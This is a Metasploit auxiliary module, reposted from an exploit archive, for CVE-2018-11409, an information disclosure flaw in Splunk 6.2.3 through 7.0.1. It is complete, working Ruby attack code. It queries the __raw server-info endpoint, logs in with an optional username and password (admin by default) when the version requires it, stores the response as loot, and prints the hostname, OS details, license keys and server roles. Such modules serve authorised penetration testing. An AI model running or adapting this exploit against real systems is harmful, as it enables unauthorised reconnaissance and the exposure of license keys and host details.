Share
## https://sploitus.com/exploit?id=PACKETSTORM:180639
##  
# This module requires Metasploit: https://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
class MetasploitModule < Msf::Auxiliary  
include Msf::Exploit::Remote::HttpClient  
  
def initialize(info = {})  
super(  
update_info(  
info,  
'Name' => 'Splunk __raw Server Info Disclosure ',  
'Description' => %q{  
Splunk 6.2.3 through 7.0.1 allows information disclosure by appending  
/__raw/services/server/info/server-info?output_mode=json to a query.  
Versisons 6.6.0 through 7.0.1 require authentication.  
},  
'License' => MSF_LICENSE,  
'Author' => [  
'n00bhaxor', # msf module  
'KOF2002', # original PoC  
'h00die' # 6.6.0+  
],  
'References' => [  
[ 'EDB', '44865' ],  
[ 'URL', 'https://web.archive.org/web/20201124061756/https://www.splunk.com/en_us/product-security/announcements-archive/SP-CAAAP5E.html'],  
[ 'CVE', '2018-11409']  
],  
'DisclosureDate' => '2018-06-08',  
'Notes' => {  
'Stability' => [CRASH_SAFE],  
'Reliability' => [],  
'SideEffects' => [IOC_IN_LOGS]  
}  
)  
)  
register_options(  
[  
Opt::RPORT(8000),  
OptString.new('USERNAME', [ false, 'User to login with', 'admin']),  
OptString.new('PASSWORD', [ false, 'Password to login with', '']),  
OptString.new('TARGETURI', [ true, 'The URI of the Splunk Application', ''])  
]  
)  
end  
  
def authenticate  
login_url = normalize_uri(target_uri.path, 'en-US', 'account', 'login')  
  
res = send_request_cgi({  
'method' => 'GET',  
'uri' => login_url  
})  
  
unless res  
fail_with(Failure::Unreachable, 'No response received for authentication request')  
end  
  
cval_value = res.get_cookies.match(/cval=([^;]+)/)[1]  
  
unless cval_value  
fail_with(Failure::UnexpectedReply, 'Failed to retrieve the cval cookie for authentication')  
end  
  
auth_payload = {  
'username' => datastore['USERNAME'],  
'password' => datastore['PASSWORD'],  
'cval' => cval_value,  
'set_has_logged_in' => 'false'  
}  
  
res = send_request_cgi({  
'method' => 'POST',  
'uri' => login_url,  
'keep_cookies' => true,  
'vars_post' => auth_payload  
})  
  
unless res && res.code == 200  
fail_with(Failure::NoAccess, 'Failed to authenticate on the Splunk instance')  
end  
  
print_good('Successfully authenticated on the Splunk instance')  
end  
  
def get_contents  
request = {  
'uri' => normalize_uri(target_uri.path, 'en-US', 'splunkd', '__raw', 'services', 'server', 'info', 'server-info'),  
'keep_cookies' => true,  
'vars_get' => {  
'output_mode' => 'json'  
}  
}  
res = send_request_cgi(request)  
  
fail_with(Failure::Unreachable, "#{peer} - Could not connect to web service - no response") if res.nil?  
# 200 is <6.6.0 success, 303 is >=6.6.0 likely success but need auth first  
fail_with(Failure::UnexpectedReply, "#{peer} - Invalid response(response code: #{res.code})") unless res.code == 200 || res.code == 303  
res  
end  
  
def run  
# on 6.2.x-6.5.x this will work as its unauth  
res = get_contents  
# if we hit 6.6.0 - 7.1.0 we need to auth first  
if res.body == '{"messages":[{"type":"ERROR","text":"See Other"}]}'  
print_status('Authentication required, logging in and re-attempting')  
authenticate  
res = get_contents  
end  
  
j = res.get_json_document  
  
loot_path = store_loot('splunk.system.status', 'application/json', datastore['RHOST'], res.body, 'system_status.json')  
print_good("Output saved to #{loot_path}")  
  
print_good("Hostname: #{j['entry'][0]['content']['host_fqdn']}")  
print_good("CPU Architecture: #{j['entry'][0]['content']['cpu_arch']}")  
print_good("Operating System: #{j['entry'][0]['content']['os_name']}")  
print_good("OS Build: #{j['entry'][0]['content']['os_build']}")  
print_good("OS Version: #{j['entry'][0]['content']['os_version']}")  
print_good("Splunk Version: #{j['generator']['version']}")  
print_good("Trial Version?: #{j['entry'][0]['content']['isTrial']}")  
print_good("Splunk Forwarder?: #{j['entry'][0]['content']['isForwarding']}")  
print_good("Splunk Product Type: #{j['entry'][0]['content']['product_type']}")  
print_good("License State: #{j['entry'][0]['content']['licenseState']}")  
print_good("License Key\(s\): #{j['entry'][0]['content']['licenseKeys']}")  
print_good("Splunk Server Roles: #{j['entry'][0]['content']['server_roles']}")  
converted_time = DateTime.strptime(j['entry'][0]['content']['startup_time'].to_s, '%s').strftime('%Y-%m-%d %H:%M:%S')  
print_good("Splunk Server Startup Time: #{converted_time}")  
end  
end